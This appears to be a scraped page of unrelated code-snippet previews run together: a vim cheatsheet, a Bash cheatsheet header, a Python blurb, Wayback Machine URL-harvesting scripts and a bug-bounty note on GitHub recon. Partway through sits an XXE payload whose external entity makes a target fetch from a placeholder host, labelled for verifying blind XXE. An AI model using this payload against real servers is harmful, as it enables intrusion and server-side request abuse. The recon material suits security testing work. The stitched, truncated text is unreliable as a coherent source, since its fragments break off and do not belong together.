- C-a == Ctrl-a
- M-a == Alt-a
:q close
:w write/saves
:wa[!] write/save all windows [force]
:wq write/save and close
:q[uit]
130+ essential vim commands | |
Published on August 12th, 2013 by Jean. 22 Comments - | |
Since the 70′s, vi and vim are very popular text editors among programmers. 5 years ago, I wrote an article named “100 vim commands every programmer should know” and here is a reworked, updated version. Enjoy! | |
Basics | |
:e filename Open filename for edition | |
:w Save file | |
:q Exit Vim | |
:q! Quit without saving |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
#!/bin/bash | |
##################################################### | |
# Name: Bash CheatSheet for Mac OSX | |
# | |
# A little overlook of the Bash basics | |
# | |
# Usage: | |
# | |
# Author: J. Le Coupanec | |
# Date: 2014/11/04 |
When I need to build a web app, I reach for Python. When I need to automate some small task on my system, I reach for Python. When I want to find the most common colors in an image, I reach for Python. When I…OK, I think you get the picture. Basically, when I need to code something and the language doesn’t matter, I use Python. So what is Python?
import requests | |
import re | |
import sys | |
from multiprocessing.dummy import Pool | |
def robots(host): | |
r = requests.get( | |
'https://web.archive.org/cdx/search/cdx\ | |
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
import requests | |
import sys | |
import json | |
def waybackurls(host, with_subs): | |
if with_subs: | |
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
else: | |
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output